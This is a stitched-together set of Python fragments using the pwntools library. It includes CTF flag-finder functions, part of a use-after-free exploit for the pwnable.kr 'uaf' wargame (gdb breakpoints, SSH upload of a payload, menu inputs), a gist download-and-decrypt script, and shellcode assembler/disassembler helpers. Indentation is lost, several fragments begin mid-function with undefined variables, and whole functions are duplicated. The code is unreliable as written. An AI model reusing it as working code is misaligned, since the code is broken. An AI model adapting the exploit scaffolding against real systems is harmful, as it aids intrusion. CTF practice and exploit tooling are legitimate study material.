def _download_raw(self, remote, local):
self._initialize_sftp()
total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' %
pwn.b64(remote))
total = pwn.size(int(total.split()[0]))
if not self.silent:
pwn.log.waitfor('Downloading %s' % remote)
def update(has, _total):
if not self.silent:
pwn.log.status("%s/%s" % (pwn.size(has), total))
if self._supports_sftp:
self._sftp.get(remote, local, update)
else:
dat = ''
s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote),
silent=True)
while s.connected():
update(len(dat), 0)
dat += s.recv()
pwn.write(local, dat)
if not self.silent:
pwn.log.succeeded()
def FlagFinder(cible, flag): # {{{
regex = flag
file = cible
t = pwn.read(file)
c = re.findall(regex, str(t))
if not c:
pwn.warn("Flag non trouvé")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def Exploit(fichier, pattern):
regex = pattern
file = fichier
pwn.info("Opening file: {fichier}\n".format(fichier=file))
s = pwn.read(file)
pwn.info("Searching for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def Online(url, pattern):
regex = pattern
file = url
pwn.info("Opening file: {fichier}\n".format(fichier=file))
r = requests.session()
s = r.get(file)
s = s.content
pwn.info("Search for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def _download_raw(self, remote, local):
self._initialize_sftp()
total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote))
total = pwn.size(int(total.split()[0]))
if not self.silent:
pwn.log.waitfor('Downloading %s' % remote)
def update(has, _total):
if not self.silent:
pwn.log.status("%s/%s" % (pwn.size(has), total))
if self._supports_sftp:
self._sftp.get(remote, local, update)
else:
dat = ''
s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent = True)
while s.connected():
update(len(dat), 0)
dat += s.recv()
pwn.write(local, dat)
if not self.silent:
pwn.log.succeeded()
pwn.debug(pwn.hexdump(payload))
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
pwn.write('/tmp/payload', payload)
p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'],
gdbscript=gdbscript)
elif pwn.args.LOCAL:
pwn.write('/tmp/payload', payload)
p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
io.upload_data(payload, random_file)
p = io.process(["./uaf", str(payload_length), random_file])
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('2')
def setup():
write(filename, script)
os.chmod(filename, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
req = requests.get('https://api.github.com/gists/' + identifier)
except Exception as e:
print('Unable to download from Github.')
print(str(e))
sys.exit(1)
if req.status_code != 200:
print('Unable to download from github, debug information follows')
print(req.text)
sys.exit(1)
try:
data = b64d(json.loads(req.text)['files']['data']['content'])
except Exception as e:
print('Unpacking data from Github failed.')
print(str(e))
sys.exit(1)
cipher = Encryption(password)
decrypted = cipher.decrypt(data)
try:
if filename is None:
sys.stdout.write(decrypted)
else:
write(filename, decrypted)
except Exception as e:
print("Unable to write data to file '%s'" % filename)
print(str(e))
sys.exit(1)
def _asm(target_arch, target_os, code_blocks, emit_asm=0, keep_tmp=False):
import pwn.internal.shellcode_helper as H
import os.path, tempfile, subprocess, string, shutil
if target_arch == None:
raise Exception('You need to set the architecture with context')
tmpdir = tempfile.mkdtemp(prefix='pwn-asm-')
def path(s):
return os.path.join(tmpdir, s)
try:
magic = pwn.randoms(32, only=string.ascii_lowercase)
code = []
cpp = ['cpp', '-nostdinc', '-undef', '-w']
if pwn.DEBUG:
cpp += ['-D', 'DEBUG']
if target_os != None:
include = os.path.join(pwn.installpath, 'pwn', 'include',
target_os)
cpp += ['-I', include]
if target_os == 'linux':
if os.path.isfile(os.path.join(include, target_arch + '.h')):
cpp += ['-I', os.path.join(include, 'diet')]
code += ['#include <%s.h>' % target_arch]
elif target_os == 'freebsd':
code += ['#include <common.h>']
code += [magic]
if target_arch not in ['i386', 'amd64']:
code += ['.section .shellcode,"ax"']
asm_extra = []
if target_arch == 'arm':
code += ['.arm']
elif target_arch == 'thumb':
code += ['.thumb']
target_arch = 'arm'
elif target_arch == 'i386':
code += ['bits 32']
elif target_arch == 'amd64':
code += ['bits 64']
elif target_arch in ['mips', 'mipsel']:
code += ['.set mips2']
code += ['.set noreorder']
if target_arch == 'mips':
asm_extra += ['--EB']
else:
asm_extra += ['--EL']
target_arch = 'mips'
code += code_blocks
code = '\n'.join(code)
if target_arch in ['i386', 'amd64']:
assembler = ['nasm', '-Ox'] + asm_extra
objcopy = ['objcopy']
else:
assembler = [
os.path.join(pwn.installpath, 'binutils', target_arch + '-as')
] + asm_extra
if not os.path.isfile(assembler[0]):
raise Exception(
'Could not find the gnu assembler for this architecture: %s'
% target_arch)
objcopy = [
os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')
]
objcopy += ['-j.shellcode', '-Obinary']
if emit_asm == 2:
output = []
output += [
"/*", " Assemble with:",
" %s [input] -o [input].tmp1" % ' '.join(cpp),
" sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic,
" %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler)
]
if target_arch not in ['i386', 'amd64']:
output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)]
output += ["*/", "", code]
return '\n'.join(output)
pwn.write(path('step1'), code)
_run(cpp + [path('step1'), path('step2')])
code = pwn.read(path('step2'))
_code = code.split('\n' + magic + '\n')
if len(_code) != 2:
raise Exception("The output from cpp was weird:\n%s" % code)
code = _code[1]
if emit_asm == 1:
output = []
if target_arch in ['i386', 'amd64']:
output += [
';; Assemble with:',
';; %s <input> -o <output>' % ' '.join(assembler)
]
else:
output += [
"/*",
" Assemble with:",
' %s <input> -o <input>.tmp' % ' '.join(assembler),
' %s [input].tmp [output]' % ' '.join(objcopy),
'*/',
]
output += ["", code]
return '\n'.join(output)
pwn.write(path('step3'), code)
_run(assembler + ['-o', path('step4'), path('step3')])
if target_arch in ['i386', 'amd64']:
return pwn.read(path('step4'))
# Sanity check for seeing if the output has relocations
relocs = subprocess.check_output(['readelf', '-r',
path('step4')]).strip()
if len(relocs.split('\n')) > 1:
raise Exception('There were relocations in the shellcode:\n\n%s' %
relocs)
_run(objcopy + [path('step4'), path('step5')])
return pwn.read(path('step5'))
finally:
if not keep_tmp:
try:
shutil.rmtree(tmpdir)
except:
pass
def _disasm(data, target_arch, keep_tmp=False):
import os.path, tempfile, subprocess, shutil
if target_arch == None:
raise Exception('You need to set the architecture with context')
tmpdir = tempfile.mkdtemp(prefix='pwn-disasm-')
def path(s):
return os.path.join(tmpdir, s)
try:
bfdarch = target_arch
extra = ['-w', '-N', '*']
if target_arch == 'i386':
bfdname = 'elf32-i386'
elif target_arch == 'amd64':
bfdname = 'elf64-x86-64'
bfdarch = 'i386:x86-64'
elif target_arch == 'arm':
bfdname = 'elf32-littlearm'
elif target_arch == 'thumb':
bfdname = 'elf32-littlearm'
bfdarch = 'arm'
extra = ['--prefix-symbol=$t.']
elif target_arch == 'mips':
bfdname = 'elf32-bigmips'
elif target_arch == 'mipsel':
bfdname = 'elf32-littlemips'
elif target_arch == 'alpha':
bfdname = 'elf64-alpha'
elif target_arch == 'cris':
bfdname = 'elf32-cris'
elif target_arch == 'ia64':
bfdname = 'elf64-ia64-little'
bfdarch = 'ia64-elf64'
elif target_arch == 'm68k':
bfdname = 'elf32-m68k'
elif target_arch == 'powerpc':
bfdname = 'elf32-powerpc'
elif target_arch == 'vax':
bfdname = 'elf32-vax'
if target_arch in ['i386', 'amd64']:
objcopy = ['objcopy']
objdump = ['objdump', '-Mintel']
else:
objcopy = [
os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')
]
objdump = [
os.path.join(pwn.installpath, 'binutils', 'promisc-objdump')
]
objcopy += [
'-I',
'binary',
'-O',
bfdname,
'-B',
bfdarch,
'--set-section-flags',
'.data=code',
'--rename-section',
'.data=.text',
]
objdump += ['-d']
pwn.write(path('step1'), data)
_run(objcopy + extra + [path('step1'), path('step2')])
output0 = subprocess.check_output(objdump + [path('step2')])
output1 = output0.split('<.text>:\n')
if len(output1) != 2:
raise Exception('Something went wrong with objdump:\n\n%s' %
output0)
else:
return output1[1].strip('\n')
finally:
if not keep_tmp:
try:
shutil.rmtree(tmpdir)
except:
pass
def _asm(target_arch, target_os, code_blocks, emit_asm = 0, keep_tmp = False):
import pwn.internal.shellcode_helper as H
import os.path, tempfile, subprocess, string, shutil
if target_arch == None:
raise Exception('You need to set the architecture with context')
tmpdir = tempfile.mkdtemp(prefix = 'pwn-asm-')
def path(s):
return os.path.join(tmpdir, s)
try:
magic = pwn.randoms(32, only = string.ascii_lowercase)
code = []
cpp = ['cpp', '-nostdinc', '-undef', '-w']
if pwn.DEBUG:
cpp += ['-D', 'DEBUG']
if target_os != None:
include = os.path.join(pwn.installpath, 'pwn', 'include', target_os)
cpp += ['-I', include]
if target_os == 'linux':
if os.path.isfile(os.path.join(include, target_arch + '.h')):
cpp += ['-I', os.path.join(include, 'diet')]
code += ['#include <%s.h>' % target_arch]
elif target_os == 'freebsd':
code += ['#include <common.h>']
code += [magic]
if target_arch not in ['i386', 'amd64']:
code += ['.section .shellcode,"ax"']
asm_extra = []
if target_arch == 'arm':
code += ['.arm']
elif target_arch == 'thumb':
code += ['.thumb']
target_arch = 'arm'
elif target_arch == 'i386':
code += ['bits 32']
elif target_arch == 'amd64':
code += ['bits 64']
elif target_arch in ['mips', 'mipsel']:
code += ['.set mips2']
code += ['.set noreorder']
if target_arch == 'mips':
asm_extra += ['--EB']
else:
asm_extra += ['--EL']
target_arch = 'mips'
code += code_blocks
code = '\n'.join(code)
if target_arch in ['i386', 'amd64']:
assembler = ['nasm', '-Ox'] + asm_extra
objcopy = ['objcopy']
else:
assembler = [os.path.join(pwn.installpath, 'binutils', target_arch + '-as')] + asm_extra
if not os.path.isfile(assembler[0]):
raise Exception('Could not find the gnu assembler for this architecture: %s' % target_arch)
objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
objcopy += ['-j.shellcode', '-Obinary']
if emit_asm == 2:
output = []
output += [
"/*",
" Assemble with:",
" %s [input] -o [input].tmp1" % ' '.join(cpp),
" sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic,
" %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler)
]
if target_arch not in ['i386', 'amd64']:
output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)]
output += ["*/", "", code]
return '\n'.join(output)
pwn.write(path('step1'), code)
_run(cpp + [path('step1'), path('step2')])
code = pwn.read(path('step2'))
_code = code.split('\n' + magic + '\n')
if len(_code) != 2:
raise Exception("The output from cpp was weird:\n%s" % code)
code = _code[1]
if emit_asm == 1:
output = []
if target_arch in ['i386', 'amd64']:
output += [
';; Assemble with:',
';; %s <input> -o <output>' % ' '.join(assembler)
]
else:
output += [
"/*",
" Assemble with:",
' %s <input> -o <input>.tmp' % ' '.join(assembler),
' %s [input].tmp [output]' % ' '.join(objcopy),
'*/',
]
output += ["", code]
return '\n'.join(output)
pwn.write(path('step3'), code)
_run(assembler + ['-o', path('step4'), path('step3')])
if target_arch in ['i386', 'amd64']:
return pwn.read(path('step4'))
# Sanity check for seeing if the output has relocations
relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip()
if len(relocs.split('\n')) > 1:
raise Exception('There were relocations in the shellcode:\n\n%s' % relocs)
_run(objcopy + [path('step4'), path('step5')])
return pwn.read(path('step5'))
finally:
if not keep_tmp:
try:
shutil.rmtree(tmpdir)
except:
pass
def _disasm(data, target_arch, keep_tmp = False):
import os.path, tempfile, subprocess, shutil
if target_arch == None:
raise Exception('You need to set the architecture with context')
tmpdir = tempfile.mkdtemp(prefix = 'pwn-disasm-')
def path(s):
return os.path.join(tmpdir, s)
try:
bfdarch = target_arch
extra = ['-w', '-N', '*']
if target_arch == 'i386':
bfdname = 'elf32-i386'
elif target_arch == 'amd64':
bfdname = 'elf64-x86-64'
bfdarch = 'i386:x86-64'
elif target_arch == 'arm':
bfdname = 'elf32-littlearm'
elif target_arch == 'thumb':
bfdname = 'elf32-littlearm'
bfdarch = 'arm'
extra = ['--prefix-symbol=$t.']
elif target_arch == 'mips':
bfdname = 'elf32-bigmips'
elif target_arch == 'mipsel':
bfdname = 'elf32-littlemips'
elif target_arch == 'alpha':
bfdname = 'elf64-alpha'
elif target_arch == 'cris':
bfdname = 'elf32-cris'
elif target_arch == 'ia64':
bfdname = 'elf64-ia64-little'
bfdarch = 'ia64-elf64'
elif target_arch == 'm68k':
bfdname = 'elf32-m68k'
elif target_arch == 'powerpc':
bfdname = 'elf32-powerpc'
elif target_arch == 'vax':
bfdname = 'elf32-vax'
if target_arch in ['i386', 'amd64']:
objcopy = ['objcopy']
objdump = ['objdump', '-Mintel']
else:
objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
objdump = [os.path.join(pwn.installpath, 'binutils', 'promisc-objdump')]
objcopy += ['-I', 'binary',
'-O', bfdname,
'-B', bfdarch,
'--set-section-flags', '.data=code',
'--rename-section', '.data=.text',
]
objdump += ['-d']
pwn.write(path('step1'), data)
_run(objcopy + extra + [path('step1'), path('step2')])
output0 = subprocess.check_output(objdump + [path('step2')])
output1 = output0.split('<.text>:\n')
if len(output1) != 2:
raise Exception('Something went wrong with objdump:\n\n%s' % output0)
else:
return output1[1].strip('\n')
finally:
if not keep_tmp:
try:
shutil.rmtree(tmpdir)
except:
pass